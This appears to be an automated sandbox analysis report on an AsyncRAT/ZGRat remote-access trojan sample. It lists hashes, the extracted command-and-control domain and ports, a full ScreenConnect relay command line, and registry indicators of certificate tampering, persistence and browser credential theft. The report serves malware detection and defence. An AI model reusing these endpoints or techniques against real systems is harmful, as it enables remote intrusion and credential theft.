asyncrat | b639a01836faf5ee4f143bf2067c13ab6f0300714a959e84fcf7c014654dfd5a

Analysis

max time kernel
93s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
09-05-2024 14:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

52b71d4c548dba2c6a3f1b53ce4dfda0_NeikiAnalytics.exe
Size

84KB
MD5

52b71d4c548dba2c6a3f1b53ce4dfda0
SHA1

4054ca4f3497f886baeee6b0336118b9a82dfcfd
SHA256

b639a01836faf5ee4f143bf2067c13ab6f0300714a959e84fcf7c014654dfd5a
SHA512

aa27a9e20e3dfa72a29110f34cf9e27dfd3cdd8875b3cfb97ad9487134d6e75f874f3fd4d5f3155a8601670b277322ebe269c044dc2efee8843bc27878bc8ab3
SSDEEP

1536:+azWlKzJVcNp++yQNS6xNNCT2l8NE8llbpTaCJRpsWr6cdaQTJSvYYS7Q8xB:yFNpo6rIKlUE8fbkqRfbaQlaYYSB

Score

10^/10

asyncrat zgrat default persistence rat spyware stealer

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

Default

connectpromidlsr.webredirect.org:6606

connectpromidlsr.webredirect.org:7707

connectpromidlsr.webredirect.org:8808

connectpromidlsr.webredirect.org:333

Mutex

AsyncMutex_alosh

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect ZGRat V1 1 IoCs

resource	yara_rule
behavioral2/memory/1640-446-0x0000000006F30000-0x0000000006F6E000-memory.dmp	family_zgrat_v1

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 648 created 3500	648	Powerseller.pif	56
PID 648 created 3500	648	Powerseller.pif	56

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Downloads MZ/PE file

Manipulates Digital Signatures 1 TTPs 4 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	52b71d4c548dba2c6a3f1b53ce4dfda0_NeikiAnalytics.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	52b71d4c548dba2c6a3f1b53ce4dfda0_NeikiAnalytics.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	52b71d4c548dba2c6a3f1b53ce4dfda0_NeikiAnalytics.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	52b71d4c548dba2c6a3f1b53ce4dfda0_NeikiAnalytics.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (9af43015-831c-4546-87f5-e31e2bd88f3b)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\CG0YDYKM.6MR\\3AJ4A891.8XQ\\scre..tion_25b0fbb6ef7eb094_0017.0009_629c4ac188703c2a\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=instance-ybe1u4-relay.screenconnect.com&p=443&s=9af43015-831c-4546-87f5-e31e2bd88f3b&k=BgIAAACkAABSU0ExAAgAAAEAAQB9oZkHo8fLWTiOtaWPDPr6Fh8vcrfCE%2f5Uc8tTlE7XQriSjPsIzcAO6u2Uz2qqWqvopf0thzA4DoPzQutPxaVEKr%2bzCFL%2fV7ZzOJOm55We3jPph46HbjSc3ZB98AsiB7WE%2fLd94l6MeaJaGEOLuwahVW0lIOgO3SbxE8Z%2buROg3AUk57rpdf1tAw8ZdJohZbQOkEm6Vk6eM4jEek6IiKYMhSsmx5GVKH8ULIQD8Q7ptwku4Syq0Vugiyeq1CErsejYDCnrbZVDX4tQFFqnt0NFHSOvTv%2fqQibLpoxMRHBb0KSrcPhlhyxQdohtkWz9NWhRd3awfrLwlL0qnXn5bTGx&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA%2fvw6PIZ12UeS%2baV0tbBYAAAAAAACAAAAAAAQZgAAAAEAACAAAACy8BX9B99BTc1IvwmBwxxfkokbA4%2bLvrb%2bepd8p9uF6wAAAAAOgAAAAAIAACAAAACWXON5%2bC2kfJRbAEPLcbFAKZnJI7dZ8wVNydZLOxkjF6AEAAAQ%2fFFBMlUMHLEI41fF6y%2bHFNAa0T%2bVcWAyA2p0RXPUw%2bpGYMLnhsiqkeAYiOx44%2f8HyVgxBYV0yiiT7u0TGA6n1Js%2bktSvDMXDua9ik4dp6y91gb91%2fNVdmCDQgR8%2fcwAcQuFGTlC1bGvyQTHnZHb5UgnNbFwIUNJ9lYTZrg8aGfPZ%2fLtIZMUlA3OKfjq3QZRWLuKx6dtLBo2Ut7E3S%2bQBveT2i6XFtQseUW8ilM%2fdeus0wDw0Wl68AIxC%2fBEJvM1zh2iU4tbDou6NnoEMha8jVBlDX5RdvxyHVnGw1Sq1joARthxQB14%2frDM%2fhKPTVo9L%2bbLwkocjh8sm%2bGkT7ntnyNzTdPHRzfAImcoaerKRuw3%2bFjuwxloFeoA5UYvGByW2mUixSXzW%2bzuFh5jX1QbClrdAGW83%2bLnGVFBd3c9YtwKq7BbiEZvuxeHDaLZ27Hkxc0HFxJxqSyq%2fi6Fm4DAu%2fvy73qgaEDb%2fXnrjPfOft0iRjgNUZaaj1nPiBU7Tqwz11tby5WOGW7XvnE69vD8a1AiOdzJRRaXzjOE94D7Uu5YRMRUc0l7s9%2bN0jNgYtUc3ioRY0Fe0l1VMG2iVDUckbym6u2XrQAchYfv38mcYZhV7mXppIJJYk2fszBgHlCtxiEySsAgYBOVnDVSA%2fBBe1%2fltSCR%2bZ6JnHdp6ZFVjIP0bLCnE8LNtCxSc7r85g0OMz8NaM0y5zBtgkmFa%2fI%2fmYjQG8ZqZTWmDdatry3ZHH9jAQ%2fbrTwhpknyOMTTjZoeK3Uuh4xhH%2fPA2FgGTQeMyiR0Rrn%2fXtAmCDFbUNDIur67%2f6Kg9uZs3uaGdAeVIubPPIZ5Wr9EQNGKXwwTi4Q7o5RVs954uAWctOrZ5I%2fQCSlpg7fnLtC%2fD%2fO1hEOic5vPPuGDcEOe%2bBYvJqzeOTE6BmJDdwKIVidbbFu5KXpb80H9akU2bwpoqCyC3i%2f8r%2fplgNDNijDAMkm2MpvV1CyJf49TU6bk9%2fmgz4VWLns4OaQ%2bqPXrWIKIQzxob2223hVrUtb5nlOzD8WFYgqS4tWFlame81TQRPqkPrCtDAL0AOh5lrUs45ac0P2pq1g0LW6eg%2blQtzz9X%2bsGi3WRbYU36NRxG0zfC1Srnr8fCvXT69K2RQbF9EGoJphGdEFMZfilmEPhpGDBV1k9wnXy4BabpgzdkwZ3MehyRZTFuIU56WINcY10uxp075CqOOtTd5UWAZGYu%2bFEldPPX9hIoGQRKwaaJw%2buLf3n78sGAGmNQ5LXu%2fYZj5OFDDRQGwoqWZ6omsha3YeWKx1b6CEXEL4jkqJgsN8FO%2fYkUl5AFfUN9CicW6y3%2bsnpqlRQlqrxkksbcJ3g85L8ouCnisgcrxuK0w%2fazsGPDmP9ci0b1Hhzw8vzHGIrv2zBt9DPoef2KhjaDPbkIaTOmNaQIBZyvi3r5rOWuYJaBEvN7cEPHyx%2bMS9yMvF8%2fkKC2iz1pWZnRtPM7jN85E7mWJmLgTSzNauQw7LwQH0goZVJxrwsdbxyMNHrIENBaoMc57azwiRyfRF3XFY4AqdIghUmSxTqwD4%2bH%2fEXZdDfkeznujWPc5eXzzkAAAAC3pnTTv%2bs8V6ulmRkXmYLKxHPig%2f85oMQ4hl1rP%2bvftldFpErbUb5SZiKyZZ6Wm3MhNbivVHFdsyq5SpcJ%2bk4W&r=&i=Untitled%20Session\" \"1\""	ScreenConnect.ClientService.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	PublisherPunishment.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoHarbor.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoHarbor.url	cmd.exe

Executes dropped EXE 9 IoCs

pid	Process
1928	ScreenConnect.WindowsClient.exe
4444	ScreenConnect.ClientService.exe
1940	ScreenConnect.ClientService.exe
704	ScreenConnect.WindowsClient.exe
2012	ScreenConnect.WindowsClient.exe
2960	ScreenConnect.WindowsClient.exe
5016	PublisherPunishment.exe
648	Powerseller.pif
1640	RegAsm.exe

Loads dropped DLL 16 IoCs

pid	Process
4444	ScreenConnect.ClientService.exe
4444	ScreenConnect.ClientService.exe
4444	ScreenConnect.ClientService.exe
4444	ScreenConnect.ClientService.exe
4444	ScreenConnect.ClientService.exe
4444	ScreenConnect.ClientService.exe
1940	ScreenConnect.ClientService.exe
1940	ScreenConnect.ClientService.exe
1940	ScreenConnect.ClientService.exe
1940	ScreenConnect.ClientService.exe
1940	ScreenConnect.ClientService.exe
1940	ScreenConnect.ClientService.exe
1940	ScreenConnect.ClientService.exe
1940	ScreenConnect.ClientService.exe
1940	ScreenConnect.ClientService.exe
1940	ScreenConnect.ClientService.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File opened for modification	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
2468	tasklist.exe
4908	tasklist.exe

Modifies data under HKEY_USERS 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\lock!04000000bb56570e8807000088080000000000000000000 = 30303030303738382c30316461613231393638323038663263	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0009_629c4ac188703c2a\identity = 68747470733a2f2f636f6c6f6e69616c3332312e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0009_629c4ac188703c2a\PreparedForExecution = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_629c4ac188703c2a\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c3	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_629c4ac188703c2a	ScreenConnect.WindowsClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\StateStore_RandomString = "EET6KMA9WZYTZJ5B06JT7VCW"	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_629c4ac188703c2a\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\DigestValue = e92a4eaee9d896964de541ce2f01c2404b638258	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Installations	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_629c4ac188703c2a\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\implication!scre..tion_25b0fbb6ef7eb094_0017.0009_89 = 68747470733a2f2f636f6c6f6e69616c3332312e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\lock!0c000000bb56570e8807000088080000000000000000000 = 30303030303738382c30316461613231393638323038663263	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\Transform = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Visibility	ScreenConnect.WindowsClient.exe
